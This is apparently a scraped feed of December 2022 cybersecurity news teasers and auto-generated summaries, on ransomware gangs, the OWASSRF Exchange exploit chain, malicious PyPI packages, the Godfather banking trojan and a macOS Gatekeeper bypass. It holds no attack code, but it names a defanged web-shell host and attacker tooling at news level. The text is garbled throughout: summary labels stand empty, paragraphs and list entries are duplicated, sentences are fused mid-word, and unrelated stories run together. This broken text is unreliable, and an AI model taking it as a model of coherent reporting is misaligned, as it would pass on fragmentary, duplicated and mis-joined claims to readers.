The uploaded files spotted by Wordfence are the following: kon.php/1tes.php – this file loads a copy of the “marijuana shell” file manager in memory from a remote location (shell[.]prinsh[.]com) – this file loads a copy of the “marijuana shell” file manager in memory from a remote location (shell[.]prinsh[.]com) b.php – simple uploader file – simple uploader file admin.php – password-protected backdoor The analysts report that most attacks occurred in November before admins could patch the flaw, but a second peak was observed on December 14, 2022. "Autosummary:
Other reports this week shed light on various ransomware operations: Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @FourOctets, @billtoulas, @DanielGallagher, @demonslay335, @struppigel, @jorntvdw, @LawrenceAbrams, @malwrhunterteam, @VK_Intel, @PolarToffee, @fwosar, @Ionut_Ilascu, @Seifreed, @malwareforme, @serghei, @IBMSecurity, @PRODAFT, @CrowdStrike, @LabsSentinel, @Fortinet, @zscaler, @TrendMicro, and @pcrisk. December 21st 2022 Royal ransomware may have been first observed by researchers around September 2022, but it has seasoned cybercriminals behind it: The threat actors running this ransomware — who used to be a part of Conti Team One, according to a mind map shared by Vitali Kremez — initially dubbed it Zeon ransomware, until they rebranded it to Royal ransomware. "Autosummary:
"Éireann Leverett, Technology and Risk Entrepreneur, makes audience think about ransomware risks from more that one perspective, and that includes the perspective of the threat actors. He also lays out the many interesting results of an analysis of a decade of known ransomware attacks and paid ransoms. This video was recorded at IRISSCON 2022, an annual conference organized by IRISSCERT. The all-day event focuses on providing attendees with an overview of the current cyber threats … More
The post Adversarial risk in the age of ransomware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Other prominent countries include China, Germany, Canada, Italy, and the U.K. FIN7"s intrusion techniques, over the years, have further diversified beyond traditional social engineering to include infected USB drives, software supply chain compromise and the use of stolen credentials purchased from underground markets. "Autosummary:
"Autosummary:
Similarity between Chilly and PolyVice (SentinelOne) The differences lie in campaign-specific details like the file extension, ransom note name, hardcoded master key, wallpaper, etc., which supports the common vendor hypothesis. "Autosummary:
"Microsoft spotted an upgraded variant of the Zerobot botnet that spreads by exploiting Apache vulnerabilities. Microsoft Threat Intelligence Center (MSTIC) researchers discovered a new variant of the Zerobot botnet (aka ZeroStresser) that was improved with the capabilities to target more Internet of Things (IoT) devices. The IT giant is tracking this cluster of threat activity […]
The post A new Zerobot variant spreads by exploiting Apache flaws appeared first on Security Affairs.
"Autosummary:
Zerobot was also observed spreading by exploiting dozens of vulnerabilities, the version Zerobot 1.1 includes several new flaws, including: Vulnerability Affected software CVE-2017-17105 Zivif PR115-204-P-RS CVE-2019-10655 Grandstream CVE-2020-25223 WebAdmin of Sophos SG UTM CVE-2021-42013 Apache CVE-2022-31137 Roxy-WI CVE-2022-33891 Apache Spark ZSL-2022-5717 MiniDVBLinux “Since the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. "Autosummary:
While the personal info stolen in the attack varies for each customer, the attackers obtained a wide range of data, including names, contact info (like postal addresses, email addresses, and phone numbers), dates of birth, hashed Social Security numbers, account identifiers (like player IDs and screen names) and info related to transactions with BetMGM. "The Vice Society ransomware group has adopted new custom ransomware, with a strong encryption scheme, in recent intrusions. SentinelOne researchers discovered that the Vice Society ransomware gang has started using a custom ransomware that implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms. Vice Society ransomware has been active since June 2021, it is considered […]
The post Vice Society ransomware gang is using a custom locker appeared first on Security Affairs.
"Autosummary:
Further investigation also revealed that codebase for the Vice Society Windows payload has been used to build custom-branded payloads for other ransomware groups, such as “Chily” and “SunnyDay.” The new variant, dubbed “PolyVice”, was used in a recent attack and appended the file extension “.ViceSociety” to all encrypted files. "Categories: Android Categories: News Tags: Android Tags: banking Trojan Tags: Godfather Tags: Anubis Tags: lay-over screen Tags: C&C Tags: MYT Tags: Google Protect Researchers have uncovered a new campaign of the Godfather banking Trojan, that comes with some new tricks. |
The post Godfather Android banking malware is on the rise appeared first on Malwarebytes Labs.
"Autosummary:
The most popular target apps for the banking Trojan are in the United States (49 companies), Turkey (31), Spain (30), Canada (22), France (20), Germany (19), and the United Kingdom (17).The Trojan checks the system language of the infected device and shuts down if it is one of these: Russian, Azerbaijani, Armenian, Belarusian, Kazakh, Kyrgyz, Moldovan, Uzbek, or Tajik. "Categories: News Categories: Ransomware Tags: The Guardian Tags: IT incident Tags: internal network Tags: ransomware Major news outlet The Guardian has suffered from an IT incident that it suspects is ransomware. |
The post The Guardian hit by "ransomware attack" appeared first on Malwarebytes Labs.
"Autosummary:
To avoid falling victim, there are some basic precautions organizations can take: Install patches as soon as possible, especially for internet facing devices Run an anti-virus/anti-malware solution that actively monitors and scans your systems Limit internet access to critical devices and systems where possible Ask the same prudence of your service providers Maintain offsite, offline backups and test that you can restore from them Train your staff so they have the information they need to: Be alert about phishing attempts Use secure and unique passwords If and when we find out more about this attack, we will keep you posted here. "Marlin Hawk has tracked and analyzed the profiles of 470 CISOs year-over-year to understand the changing dynamics in this critical leadership position. The research shows the CISO seat to be relatively industry-agnostic—with 84% of CISOs having a career history of working across multiple sectors—with today’s CISOs expected to bring more breadth of leadership to their role as they move away from being technical experts. “Today’s CISOs are taking up the mantle of responsibilities that have … More
The post CISO roles continue to expand beyond technical expertise appeared first on Help Net Security.
"Autosummary:
Larkin went on to say, “As the importance of information security has grown, boards of directors, regulators, and shareholders have demanded greater controls, better risk management as well as more people and departments focusing on defending a company and its assets. “Now candidates are being internally promoted to the role of CISO from IT Risk, Operational Risk Management, IT Audit, Technology Risk & Controls, among others,” Larkin added. "Autosummary:
Godfather targeting overview (Group-IB) Interestingly, the trojan is configured to check the system language, and if it"s set to Russian, Azerbaijani, Armenian, Belarusian, Kazakh, Kyrgyz, Moldovan, Uzbek, or Tajik, it stops its operation. Almost half of all apps targeted by Godfather, 215, are banking apps, and most of them are in the United States (49), Turkey (31), Spain (30), Canada (22), France (20), Germany (19), and the UK (17). "Autosummary:
This includes 215 banks, 94 crypto wallet providers, and 110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, Canada, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker News. "Autosummary:
"Autosummary:
"German multinational industrial engineering and steel production company ThyssenKrupp AG was the target of a cyberattack. German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that the Materials Services division and corporate headquarters were hit by a cyberattack. At this time the company has yet to disclose the type of attack that hit […]
The post German industrial giant ThyssenKrupp targeted in a new cyberattack appeared first on Security Affairs.
"Autosummary:
“At the present time, no damage has been done, nor are there any indications that data has been stolen or modified,” This isn’t the first attack suffered by the company, in 2012, the company was targeted by another cyber attack that was classified as “heavy” and of “exceptional quality.” "Ransomware-wielding attackers are using a new exploit chain that includes one of the ProxyNotShell vulnerabilities (CVE-2022-41082) to achieve remote code execution on Microsoft Exchange servers. The ProxyNotShell exploit chain used CVE-2022-41040, a SSRF vulnerability in the Autodiscover endpoint of Microsoft Exchange, while this new one uses CVE-2022-41080 to achieve privilege escalation through Outlook Web Access (OWA). The exploit chain – dubbed OWASSRF by Crowdstrike researchers – can only be headed off by implementing the patches … More
The post New Microsoft Exchange exploit chain lets ransomware attackers in (CVE-2022-41080) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"When a user searches for that business or service, these advertisements appear at the very top of search results with minimum distinction between an advertisement and an actual search result," warns the FBI. "Autosummary:
As first reported by Ars Technica, a Corsair spokesperson responded to concerns, saying that their keyboards do not have keylogging capabilities, nor do they actively monitor what users type on them. "Autosummary:
It targets many system architectures and devices, including i386, AMD64, ARM, ARM64, MIPS, MIPS64, MIPS64le, MIPSle, PPC64, PPC64le, RISC64, and S390x. "Categories: Business Categories: News Tags: FBI. FDA Tags: USDA Tags: BEC Tags: business email compromise Tags: domain mimicry Tags: spear phishing Business email compromise is not just after money alone anymore, they will take truckloads of agricultural products as well. |
The post BEC scammers go after more than just money appeared first on Malwarebytes Labs.
"Autosummary:
To be proactive, you should look for additional punctuation, changes in the top-level domain (i.e. “.com” vs “.gov”), added prefixes or suffixes, and the use of similar characters (i.e. “close” vs “c1ose”) or a minor misspelling of the domain. In a joint Cybersecurity Advisory (CSA) the Federal Bureau of Investigation (FBI), the Food and Drug Administration Office of Criminal Investigations (FDA OCI), and the US Department of Agriculture (USDA) recently observed incidents of Business Email Compromise (BEC) with a new twist. "Categories: News Tags: H-Hotel Tags: Play ransomware Tags: ransomware Tags: extortion Tags: threat Tags: breach Tags: EDR A ransomware group claims to have stolen data from the H-Hotel chain, and is now threatening to leak it if the ransom is not paid |
The post Play ransomware group claims to have stolen hotel chain data appeared first on Malwarebytes Labs.
"Autosummary:
There is no indication how much data has been stolen, but the listing mentions “Private, personal data, clients documents, passports, ID, etc”.Posted: December 21, 2022 by A ransomware group claims to have stolen data from the H-Hotel chain, and is now threatening to leak it if the ransom is not paid H-Hotels, a large hospitality chain with 60 hotels across several countries including Germany and Switzerland has announced it has fallen victim to a ransomware attack. "Play ransomware attacks target Exchange servers with a new exploit that bypasses Microsoft’s ProxyNotShell mitigations. Play ransomware operators target Exchange servers using a new exploit chain, dubbed OWASSRF by Crowdstrike, that bypasses Microsoft’s mitigations for ProxyNotShell vulnerabilities. The ProxyNotShell flaws are: they impact Exchange Server 2013, 2016, and 2019, an authenticated attacker can trigger them […]
The post Play ransomware attacks use a new exploit to bypass ProxyNotShell mitigations on Exchange servers appeared first on Security Affairs.
"Autosummary:
– Installed Screen Connect, ID: b81d2f07c9163bf5, URL: instance-cmjrni-relay.screenconnect[.]com – Deployed Mimikatz Crawled and saved their tools, you can access… pic.twitter.com/8vA3LNtpul — Dray Agha (@Purp1eW0lf) December 14, 2022 The leaked tools included a Python script, poc.py, that when executed, led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks. "Researchers spotted a malicious package in the Python Package Index (PyPI) repository that impersonates a software development kit (SDK) for SentinelOne. Cybersecurity researchers at ReversingLabs have discovered a new malicious package, named ‘SentinelOne,’ on the Python Package Index (PyPI) repository that impersonates a legitimate software development kit (SDK) for SentinelOne. The malicious package was first […]
The post Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware appeared first on Security Affairs.
"Autosummary:
The package claims to offer access the SentinelOne’s APIs, but it actually contains malicious code to harvest sensitive information from development systems, including credentials, configuration data, and SSH keys. "In this Help Net Security video, Dave Trader, Field CISO at Presidio, talks about the evolution of ransomware attacks and outlines what we can expect in 2023. The lack of fundamental cybersecurity practices and controls, including critical vulnerability patching and employee cybersecurity training, undermines organizational attempts to improve ransomware defenses. A ransomware crisis leaves deep marks on all those affected. In fact, IT and security teams can turn into disarray long after the problem has … More
The post Ransomware predictions for 2023 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The malicious packages that contain these information stealers are: modulesecurity – 114 downloads – 114 downloads informmodule – 110 downloads – 110 downloads chazz – 118 downloads – 118 downloads randomtime – 118 downloads – 118 downloads proxygeneratorbil – 91 downloads – 91 downloads easycordey – 122 downloads – 122 downloads easycordeyy – 103 downloads – 103 downloads tomproxies – 150 downloads – 150 downloads sys-ej – 186 downloads – 186 downloads py4sync – 453 downloads – 453 downloads infosys – 191 downloads – 191 downloads sysuptoer – 186 downloads – 186 downloads nowsys – 202 downloads – 202 downloads upamonkws – 205 downloads – 205 downloads captchaboy – 123 downloads – 123 downloads proxybooster – 69 downloads While these packages drop stealers that use different names, like Celestial Stealer, ANGEL stealer, Satan Stealer, @skid Stealer, and Leaf $tealer, Phylum has found that they are all based on the W4SP code. "Autosummary:
When the shortcut is executed, it abuses the legitimate "MSIExec.exe" Windows executable to download a malicious MSI installer that installs the Raspberry Robin payloads Typical Raspberry Robin infection chain (Trend Micro) Double trouble The malware is heavily obfuscated to hide its code from antivirus programs and security researchers, featuring multiple layers containing hard-coded values for decrypting the next one. "Autosummary:
Casbaneiro"s features run the typical backdoor gamut that allows it to seize control of banking accounts, take screenshots, perform keylogging, hijack clipboard data, and even function as a clipper malware to hijack crypto transactions. "Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper. Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that could be exploited by threat actors to bypass the Gatekeeper security feature. The Apple Gatekeeper is designed to protect […]
The post Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS appeared first on Security Affairs.
"Autosummary:
The Achilles vulnerability relies on the Access Control Lists (ACLs) permission model to add extremely restrictive permissions to a downloaded file (i.e., “everyone deny write, writeattr, writeextattr, writesecurity, chown”), to block the Safari browser from setting the quarantine extended attribute. "Autosummary:
OWASSRF PoC exploit leaked online While CrowdStrike security researchers were working on developing their own proof-of-concept (PoC) code to match the log info found while investigating these recent Play ransomware attacks, Huntress Labs threat researcher Dray Agha found and leaked a threat actor"s tooling online, on December 14th. "Categories: Business AV-TEST, a leading independent tester of cybersecurity solutions, has just ranked Malwarebytes as a Top Product for consumers and businesses for the fourth quarter in a row. |
The post Malwarebytes earns AV-TEST Top Product awards for fourth consecutive quarter appeared first on Malwarebytes Labs.
"Autosummary:
For the Performance category, experts at the AV-TEST laboratory examined the effect security products had on performance, placing special attention to four categories: Slowing-down when launching popular websites Slower download of frequently-used programs Slower launch of standard software programs Slower installation of frequently-used programs Slower copying of files (locally and in a network) Both Malwarebytes Premium and Malwarebytes Endpoint Protection scored 100% on the performance test for Sep-Oct 2022, by and large meeting or beating the industry average in each of the four categories. Learn more about what experts and customers are saying about Malwarebytes: Malwarebytes recognized as endpoint security leader by G2 MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks Malwarebytes receives highest rankings in recent third-party tests Malwarebytes outperforms competition in latest MRG Effitas assessment "Categories: News Tags: SevenRooms Tags: third party Tags: vendor Tags: breach Tags: data Tags: tool Tags: forum We take a look at reports confirmed by SevenRooms that a third party vendor breach may have impacted its customers. |
The post Restaurant platform SevenRooms confirms data breach appeared first on Malwarebytes Labs.
"Autosummary:
The database, weighing in at 427GB, contained promo codes, payment reports, reservation lists and more, alongside folders named after well known restaurant chains. "In this Help Net Security video, Ronnie Tokazowski, Principal Threat Advisor at Cofense, offers insight into the world’s most lucrative cybercrime – business email compromise (BEC). The Cofense team recently purchased $500 worth of trackable gift cards to intentionally give to scammers in the hopes of discovering what happens once scammers receive these funds, engaging with 54 live BEC attacks over 5 weeks. With gift cards continuing to be one of the more difficult cash-out … More
The post What happens once scammers receive funds from their victims appeared first on Help Net Security.
"Autosummary:
"Netwrix has released key cybersecurity trends that will affect organizations of all sizes in 2023. Here are five specific trends that you need to be aware of: The business of cybercrime will be further professionalized The return of malware strains like Emotet, Conti and Trickbot indicates an expansion of cybercrime for hire. In particular, the growth of ransomware-as-a-service is enabling criminals without deep technical skills to make money, either by extorting a ransom for decryption … More
The post 5 cybersecurity trends accelerating in 2023 appeared first on Help Net Security.
"Autosummary:
To overcome this challenge, organizations will rely more on their trusted security partners, such as channel partners, system integrators, MSPs and MSSPs. "Autosummary:
"Autosummary:
One of those addresses, which was first active on June 1, 2022, has transacted 11 times to date and is used in as many as 1,197 artifacts, making it the most widely used wallet address. "Researchers spotted a new variant of the Agenda ransomware which is written in the cross-platform programming language Rust. Trend Micro researchers have spotted a new variant of the Agenda ransomware (aka Qilin) that is written in Rust Language. The move follows the decision of other ransomware gangs, like Hive, Blackcat, RansomExx, and Luna, of rewriting their ransomware into […]
The post Experts spotted a variant of the Agenda Ransomware written in Rust appeared first on Security Affairs.
"Autosummary:
“It also added the -n, -p, fast, skip,and step flags on its configurations, which are not present in the Golang variant configuration and only used via command-line argument. "Autosummary:
"Autosummary:
The hotel chain employs 2,500 people and is one of the largest in the DACH region, operating under "H-Hotels" and the sub-brands Hyperion, H4 Hotels, H2 Hotels, H + Hotels, H.ostels, and H.omes. "Autosummary:
More macOS security bypasses and malware This is just one of multiple Gatekeeper bypasses found in the last several years, with many of them abused in the wild by attackers to circumvent macOS security mechanisms like Gatekeeper, File Quarantine, and System Integrity Protection (SIP) on fully patched Macs. "IT giant Cisco is warning of threat actors exploiting many old vulnerabilities in attacks in the wild. Cisco has updated multiple security advisories to warn of the active exploitation of several old vulnerabilities impacting its products. The bugs, some of which are rated as ‘critical’ severity, impact Cisco IOS, NX-OS, and HyperFlex software. Below are […]
The post Old vulnerabilities in Cisco products actively exploited in the wild appeared first on Security Affairs.
"Autosummary:
"Autosummary:
More macOS security bypasses and malware This is just one of multiple Gatekeeper bypasses found in the last several years, with many of them abused in the wild by attackers to circumvent macOS security mechanisms like Gatekeeper, File Quarantine, and System Integrity Protection (SIP) on fully patched Macs. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Vulnerability with public PoC affects Cisco IP phones, fix unavailable (CVE-2022-20968) A high-risk stack overflow vulnerability (CVE-2022-20968) may allow attackers to DoS or possibly even execute code remotely on Cisco 7800 and 8800 Series IP phones, the company has confirmed. Critical FortiOS pre-auth RCE vulnerability exploited by attackers (CVE-2022-42475) A critical RCE vulnerability (CVE-2022-42475) in Fortinet’s operating system, FortiOS, is … More
The post Week in review: Citrix and Fortinet RCEs, Microsoft fixes exploited zero-day appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Vulnerability with public PoC affects Cisco IP phones, fix unavailable (CVE-2022-20968) A high-risk stack overflow vulnerability (CVE-2022-20968) may allow attackers to DoS or possibly even execute code remotely on Cisco 7800 and 8800 Series IP phones, the company has confirmed. "IBM has unveiled that it is working with the Cloud Security Alliance (CSA) to further advance security and risk management of cloud within financial services. Building on IBM’s mission to reduce risk for the industry with security, compliance and resiliency at the forefront, the IBM Cloud Framework for Financial Services is designed to help clients automate their security and compliance posture. The framework is central to IBM Cloud for Financial Services, a cloud with built-in … More
The post IBM and CSA help financial services manage risk and regulations appeared first on Help Net Security.
"Autosummary:
Leveraging the collective intelligence of the IBM Financial Services Cloud Council – a network of more than 120 financial services CIOs, CTOs, and Risk and Compliance officers such as Banco Bradesco, Nationwide, Banco Sabadell, Virgin Money and MUFG – the platform includes industry-informed and built-in controls that can help financial institutions meet their security and compliance requirements of this highly regulated industry. "Autosummary:
From left to right, 2022 (most complex), 2021, 2020, and 2019 campaigns (Nozomi) Additionally, the number of TOR hidden services used as C2 servers has grown ten times since the 2021 campaign, following a similar redundancy approach. "Ivanti worked with cybersecurity experts and surveyed 6,500 executive leaders, cybersecurity professionals, and office workers to understand the perception of today’s cybersecurity threats and find out how companies are preparing for yet-unknown future threats. The report revealed that despite 97% of leaders and security professionals reporting their organization is as prepared or more prepared to defend against cybersecurity attacks than they were a year ago, one in five wouldn’t bet a chocolate bar they could … More
The post Executives take more cybersecurity risks than office workers appeared first on Help Net Security.
"Autosummary:
"Malwarebytes expands Malwarebytes Nebula platform with additional threat prevention capabilities developed specifically for resource constrained organizations to reduce attack surfaces from a simple, easy-to-use cloud-based interface. The company released Cloud Storage Scanning (CSS) to also protect business-critical assets stored in the cloud and prevent the introduction of malware and other threats into digital ecosystems. “In our evolution from endpoint product to a holistic protection platform, we’re seeing strong adoption of our new threat prevention modules … More
The post Malwarebytes strengthens threat prevention capabilities in Nebula platform appeared first on Help Net Security.
"Autosummary:
Malwarebytes’ cloud-based Nebula platform delivers centralized management of endpoint protection (EP) and endpoint detection and response (EDR), which removes all traces of threats (such as malware), eradicating the residual files and/or code that other solutions miss. "Keysight Technologies announced the new APS-M8400 Modular Network Cybersecurity Test Platform, which provides data center network equipment manufacturers (NEM) and operators with the high density 8-port 400GE Quad Small Form Factor Pluggable Double Density (QSFP-DD) network security test platform. Data center operators and service providers are facing exponential growth in encrypted traffic volumes and security threats driven by increases in video streaming, cloud computing, artificial intelligence (AI), machine learning (ML), and internet of things (IoT) … More
The post Keysight introduces APS-M8400 Modular Network Cybersecurity Test Platform appeared first on Help Net Security.
"Autosummary:
Fortinet is the only vendor delivering 400GE interface speeds on a hyperscale firewall via the FortiGate 7121F, 4800F, and 3700F. Keysight’s groundbreaking 8x400GE APS-M8400 cybersecurity test platform delivers the port density, multi-terabit application and TLS throughput rates, and session scalability that help Fortinet test and validate the performance and real-time threat protection our customers expect.” "Autosummary:
"US CISA added two vulnerabilities impacting Veeam Backup & Replication software to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two vulnerabilities impacting Veeam Backup & Replication software, tracked as CVE-2022-26500 and CVE-2022-26501 (CVSS 3.1 Base Score 9.8), to its Known Exploited Vulnerabilities Catalog. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant […]
The post CISA adds Veeam Backup and Replication bugs to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two vulnerabilities impacting Veeam Backup & Replication software, tracked as CVE-2022-26500 and CVE-2022-26501 (CVSS 3.1 Base Score 9.8), to its Known Exploited Vulnerabilities Catalog. "Autosummary:
These included Stowaway, an open source proxy tool, Cobalt Strike Beacon, and SPAREPART, a lightweight backdoor programmed in C, enabling the threat actor to execute commands, harvest data, capture keystrokes and screenshots, and export the information to a remote server. "Autosummary:
Currently, most of the devices infected by MCCrash are located in Russia, but there are also victims in Mexico, Italy, India, Kazakhstan, and Singapore. "Autosummary:
"Autosummary:
"Autosummary:
BlackCat ransomware behind the attack BleepingComputer has since learned that the BlackCat ransomware operation, aka ALPHV, was behind the attacks, claiming to have stolen corporate data during the attacks. "Microsoft"s December Patch Tuesday updated delivers 59 fixes, including two zero-days (CVE-2022-44698 and CVE-2022-44710) that require immediate attention on the Windows platform. This is a network focused update (TCP/IP and RDP) that will require significant testing with an emphasis on ODBC connections, Hyper-V systems, Kerberos authentication, and printing (both local and remote).
Microsoft also published an urgent out-of-band update (CVE-2022-37966) to address serious Kerberos authentication issues. (The team at Readiness has provided a helpful infographic that outlines the risks associated with each of these updates.)
Autosummary:
Core and Chakra Core) Adobe (retired???, maybe next year), Browsers Following a welcome trend of no critical updates to Microsoft"s browsers, this update delivers just three (CVE-2022-44668, CVE-2022-44708 and CVE-2022-41115) all rated important. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms ( ASP.NET Core, .NETAs this is an end-of-year update, there are quite a few "End of Service" changes, including: Windows 10 (Enterprise, Home, Pro) 21H2 - Dec. 12, 2022. Windows Microsoft released patches to the Windows ecosystem this month that address three critical updates (CVE-2022-44676, CVE-2022-44670, and CVE-2022-41076), with 24 rated important and two rated moderate. Hyper-V: After installing this update on Hyper-V hosts managed by SDN configured System Center Virtual Machine Manager (VMM), you might receive an error on workflows involving creating a new Network Adapter (also called a Network Interface Card or NIC) joined to a VM network or a new Virtual Machine (VM). "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @struppigel, @VK_Intel, @billtoulas, @FourOctets, @jorntvdw, @BleepinComputer, @DanielGallagher, @demonslay335, @malwrhunterteam, @fwosar, @Seifreed, @serghei, @malwareforme, @Ionut_Ilascu, @LawrenceAbrams, @PolarToffee, @_CPResearch_, @vinopaljiri, @cybereason, @1ZRR4H, @TalosSecurity, @pcrisk, @TrendMicro, @GeeksCyber, and @Digitaleragroup December 11th 2022 Security researchers have noticed a spike in devices infected with the TrueBot malware downloader created by a Russian-speaking hacking group known as Silence. This year, ransomware-as-a-service (RaaS) groups like BlackCat, Hive, and RansomExx have developed versions of their ransomware in Rust, a cross-platform language that makes it easier to tailor malware to different operating systems like Windows and Linux. "Categories: News Tags: InfraGard Tags: FBI Tags: critical infrastructure Tags: data breach Tags: USDoD Tags: Breach Tags: escrow service A partnership between the FBI and private sector members established to protect US critical infrastructure, called InfraGard, was infiltrated by a cybercriminal. |
The post InfraGard infiltrated by cybercriminal appeared first on Malwarebytes Labs.
"Autosummary:
InfraGard’s membership includes business executives, entrepreneurs, lawyers, security personnel, military and government officials, IT professionals, academia, and state and local law enforcement. "Categories: News Tags: virtual kidnapping Tags: kidnap Tags: scam Tags: fake Tags: fraud Tags: ransom Tags: victim Tags: wire transfer Tags: digital payment Tags: venmo Tags: cashapp Tags: social engineering Tags: phone call Tags: mobile Tags: relative A recent scam has been making the rounds that attempts to fool you into thinking a loved one has been kidnapped. |
The post Virtual kidnapping scam strikes again. Spot the signs appeared first on Malwarebytes Labs.
"Autosummary:
With this in mind, we have some tips and suggestions for you: Revisit your online presence, and lock down or delete as appropriate in relation to locations, names, and phone numbers. When fraudsters get vocal As for “using your relative’s voice”, well, no. Don’t panic. There are other tips online sourced from law enforcement, mostly in relation to asking to speak to your supposedly kidnapped relative, trying to contact them by other means while the scammers are on the line, and slowing the situation down to allow you to try and contact the kidnapee in the first place. "Categories: Exploits and vulnerabilities Categories: News Tags: Apple Tags: iOS 16.1.2 Tags: Safari 16.2 Tags: CVE-2022-42856 Tags: type confusion Apple has released new security content for iOS 16.1.2 and Safari 16.2. to fix a zero-day security vulnerability that was actively exploited |
The post Update now! Apple patches active exploit vulnerability for iPhones appeared first on Malwarebytes Labs.
"Autosummary:
Another clue was given when Apple revealed that security researchers at Google’s Threat Analysis Group, which investigates nation state-backed spyware, hacking, and cyberattacks, discovered and reported the WebKit bug. “Still, Apple has been known to back-port fixes when they"re aware of active attacks on an older system, so I doubt it"s just a matter of falling back on a disclaimer. "Microsoft"s December Patch Tuesday updated delivers 59 fixes, including two zero-days (CVE-2022-44698 and CVE-2022-44710) that require immediate attention on the Windows platform. This is a network focused update (TCP/IP and RDP) that will require significant testing with an emphasis on ODBC connections, Hyper-V systems, Kerberos authentication, and printing (both local and remote).
Microsoft also published an urgent out-of-band update (CVE-2022-37966) to address serious Kerberos authentication issues. (The team at Readiness has provided a helpful infographic that outlines the risks associated with each of these updates.)
Autosummary:
Core and Chakra Core) Adobe (retired???, maybe next year), Browsers Following a welcome trend of no critical updates to Microsoft"s browsers, this update delivers just three (CVE-2022-44668, CVE-2022-44708 and CVE-2022-41115) all rated important. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms ( ASP.NET Core, .NETAs this is an end-of-year update, there are quite a few "End of Service" changes, including: Windows 10 (Enterprise, Home, Pro) 21H2 - Dec. 12, 2022. Windows Microsoft released patches to the Windows ecosystem this month that address three critical updates (CVE-2022-44676, CVE-2022-44670, and CVE-2022-41076), with 24 rated important and two rated moderate. Hyper-V: After installing this update on Hyper-V hosts managed by SDN configured System Center Virtual Machine Manager (VMM), you might receive an error on workflows involving creating a new Network Adapter (also called a Network Interface Card or NIC) joined to a VM network or a new Virtual Machine (VM). "When it comes to sensitive data, search services are the ultimate treasure trove for hackers. Why slowly sift through information when a search service has indexed it all for you? Mistakes are inevitable and cloud misconfigurations are the number one cause of data breaches. The number two cause is when insider credentials are stolen. In either case, having your sensitive data encrypted can provide the defense-in-depth you need to prevent a mistake from becoming a … More
The post Product showcase: Searchable encryption in Elasticsearch and OpenSearch with IronCore Labs appeared first on Help Net Security.
"Autosummary:
Quick look: What you need to know about Cloaked Search Cloaked Search is a transparent proxy that encrypts data before it goes to Elasticsearch or OpenSearch while still allowing you to search that data; no plugins required Choose which indices and fields to encrypt while the rest pass through normally, so you can start with your most sensitive data and expand over time Perfect as a PET (privacy enhancing technology) for safeguarding personal information and complying with global privacy laws and data sovereignty concerns Protects against breaches, unauthorized insider access, injection attacks, and cloud misconfigurations How Cloaked Search works Cloaked Search uses encryption-in-use techniques to allow searching over encrypted data without decrypting it. Supported search functionality All of the advanced search functionality you rely on remains available to you over the Cloaked Search encrypted data, including field matching, phonetic matching, exact phrase matching, boolean queries, subdocument searches, autocompletion, wildcard searches, field boosting, and more. "In this Help Net Security video, Corey Nachreiner, CSO at WatchGuard, talks about how effective cybersecurity often boils down to doing the basics: patching, updating, and following day-to-day best practices for using applications and systems. However, sometimes this knowledge stays within the network admin/cybersecurity teams and fails to make it to “regular employees,” creating a company culture that’s susceptible to attack rather than a culture of accountability.
The post 5 tips for building a culture of cybersecurity accountability appeared first on Help Net Security.
"Autosummary:
"Distracted employees are twice as likely to do the bare minimum for security at work, according to 1Password. The findings reveal that sustained burnout, now paired with high levels of distraction, has critical implications for workplace security. “While we hope the worst of the pandemic is behind us, world events continue to unsettle and distract employees. Mishaps are inevitable – it’s not a case of if world distractions will make employees more vulnerable to human … More
The post Distractions at work can have serious cybersecurity implications appeared first on Help Net Security.
"Autosummary:
A perfect storm : Top distractions include the Covid-19 pandemic (44%), recession/inflation (42%), economic uncertainty (38%), gas prices (34%), and personal relationships (29%).Top distractions include the Covid-19 pandemic (44%), recession/inflation (42%), economic uncertainty (38%), gas prices (34%), and personal relationships (29%). : Nearly 9 in 10 employees (89%) now use authentication products or services such as two-factor (2FA) or multi-factor authentication (MFA), biometrics, password managers and single sign-on. "Autosummary:
"Talos researchers uncovered a phishing campaign distributing the QBot malware to Windows systems using SVG files. Talos researchers uncovered a phishing campaign distributing the QBot malware using a new technique that leverages Scalable Vector Graphics (SVG) images embedded in HTML email attachments. HTML smuggling is a highly evasive technique for malware delivery that leverages legitimate HTML5 […]
The post Crooks use HTML smuggling to spread QBot malware via SVG files appeared first on Security Affairs.
"Autosummary:
Once a victim receives the email and opens the attachment, their browser decodes and runs the embedded script, which then assembles a malicious payload directly on the victim’s device. "Autosummary:
The collected data – which includes GPS locations, SMSes, contacts, call logs, files, photos, and audio recordings – is then used as a pressure tactic to force victims into paying excessively high-interest rates for the loans, sometimes even in cases after the loan is repaid. "Autosummary:
Facebook post masqueraded as a support page (Trustwave) However, this post includes a link to an external phishing site named after Meta, Facebook’s owner company, to slightly reduce the chances of victims realizing the scam. "Autosummary:
